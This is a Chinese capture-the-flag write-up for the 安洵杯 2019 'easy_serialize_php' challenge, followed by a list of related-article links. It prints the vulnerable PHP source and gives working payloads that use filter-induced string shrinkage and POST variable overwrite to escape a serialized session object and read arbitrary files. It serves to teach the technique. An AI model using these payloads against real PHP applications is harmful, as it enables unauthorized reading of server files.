[安洵杯 2019]easy_serialize_php
2020-06-05 05:20
3143 查看
[安洵杯 2019]easy_serialize_php
反序列化对象逃逸
一般有两种方法
第一种是序列化之后的对象经过过滤之后导致的字符增加 如【0CTF】2016 piapiapia中 where->hacker导致的字符增加了 但是对象长度不变
第二种就是本题序列化后对象过滤导致字符减少
1.源码
$function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST); if(!$function){ echo '<a href="index.php?f=highlight_file">source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here! }else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); }
最后一段代码逻辑让咱们输入phpinfo试试
进phpinfo之后能看到flag所在的文件
最后一个判断又是file_get_contents 可以读文件 那思路应该就是让base64_decode($userinfo[‘img’])的值是flag所在的文件名
extract($_POST);
这里有变量覆盖可以改变
2.反序列化逃逸
$_SESSION["user"]='flagflagflagflagflagflag'; $_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}'; $_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn'; echo serialize($_SESSION); echo filter(serialize($_SESSION)); 结果分别为: a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";} a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
在s:24:这个位置经过过滤就会导致后面的24个字符被赋值给了user
经过构造之后刚好后面就是s:3:“img” 这样我们就把我们想要img是多少通过这种方式传入了
3.解题
这时候传参需要传入?f=show_image
然后我们需要POST传入我们构造的键对
$_SESSION['flagflag']='";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
这个时候序列化之后变为
a:1:{s:8:"flagflag";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}
经过过滤就变为
a:1:{s:8:"";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}
这样我门就把里面的 ";s:51:"做为s:8的变量名,变量值为aaa,然后就讲后面的img变量覆盖了
后面的值就可控了
传入之后会看到
$flag = 'flag in /d0g3_fllllllag';
之后我们就把后面的base64值变为上面的目录就可以了
相关文章推荐
- 2019最新《php项目开发实录全场记录》
- PHP面向对象(OOP):把对象串行化serialize()方法,__sleep()方法,__wakeup()方法
- 【PHP面向对象(OOP)编程入门教程】22.把对象串行化serialize()方法,__sleep()方法,__wakeup()方法
- PHP面向对象(OOP)编程完全教程:22.把对象串行化serialize()方法
- php serialize()与unserialize()的用法
- PHP serialize & JSON 解析
- PHP serialize & JSON 解析
- 2019最新火星人php实地培训基础课程 火星人php基础教程(63课)
- 2019最新《使用PHP+Redis实现微博的用户管理》
- PHP 中 json_encode, json_decode, serialize/unserialize 性能比较
- PHP的serialize序列化数据以及JSON格式化数据分析
- arrayDB, a New and Easy PHP ORM
- php中serialize序列化与json性能测试的示例分析
- PHP serialize & JSON 解析
- php 序列化 serialize
- php serialize()与unserialize()的用法
- PHP 序列化(serialize)格式详解
- EasyEclipse for PHP首选项配置文件下载
- 视频:easyhadoop聚会hive和phpHiveAdmin部分
- 2019PHP面试题大全